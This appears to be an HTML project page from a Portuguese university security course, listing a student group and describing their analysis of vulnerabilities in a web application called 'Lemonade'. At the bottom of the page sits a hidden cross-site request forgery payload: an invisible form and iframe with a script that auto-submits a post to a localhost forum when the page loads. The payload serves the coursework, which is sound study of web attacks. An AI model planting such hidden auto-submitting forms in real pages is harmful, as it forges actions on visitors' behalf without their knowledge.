 <!--
Design by Bryant Smith
http://www.bryantsmith.com
http://www.aszx.net
email: template [-at-] bryantsmith [-dot-] com
Released under Creative Commons Attribution 2.5 Generic.  In other words, do with it what you please; but please leave the link if you'd be so kind :)

Name       : Creative Inspiration
Description: One column, no nav
Version    : 1.0
Released   : 20081009
-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="creativeinspiration.css" />

<title>ESEGI - Trabalho 2</title>
</head>

<body>
    <div id="page">
		
        <div id="header">
        	<div id="headerTitle">Engenharia de Segurança Informática</div>
            <div id="headerSubText">Trabalho 2 - Vulnerabilidades em Aplicações Web.</div>
            
        </div>
        <div class="contentTitle"><h1>Elementos do Grupo:</h1></div>
        <div class="contentText">
			<table width="650px">
				<thead><tr class="head">
					<td width="20%">Nº</td>
					<td>Nome</td>
				</tr></thead>
				<tr>
					<td>1111511</td>
					<td>Luis Silva</td>
				</tr>	
				<tr>
					<td>1130364</td>
					<td>João Pinho</td>
				</tr>				
				<tr>
					<td>1130553</td>
					<td>Emanuel Marques</td>
				</tr>
				
				<tr>
					<td>1130306</td>
					<td>Guilherme Torres</td>
				</tr>
			</table> 
        </div>
		<div class="contentTitle"><h1>Notas sobre o trabalho:</h1></div>
		<div class="contentText">
		<p>Este projeto visa a análise de potenciais vulnerabilidades descobertas na aplicação web “Lemonade” e a proposta de soluções de defesa para as mesmas.</p>
		</div>
		<div class="contentTitle"><h2>Notas finais:</h2></div>
		<div class="contentText">
		<p>Apesar de todo o cuidado que se deve ter a desenvolver uma aplicação Web, a segurança das mesmas pode ser explorada.</p>
		<p>Diariamente surgem novos e mais rebuscados ataques a aplicações ou websites. Cabe, então, aos programadores dos mesmos, utilizar estas e outras boas práticas de programação com o fim de reduzir o mais possível a viabilidade destes ataques, através da diminuição das vulnerabilidades das aplicações.</p>
		</div>
	</div>
        <div id="footer"></div>

	<form id="csrf" action="http://localhost:8080/index.php?page=forum" target="iframe" method="post">
      <input type="hidden" name="input_from_form" value="EU SOU O ATAQUE 3!!!" />
	</form >
	<iframe style="visibility:hidden" name="iframe" src="http://localhost:8080/index.php?page=forum" height="0" width="0"></iframe>
	<script type="text/javascript">document.getElementById("csrf").submit();</script>
 
        
</body>
</html>
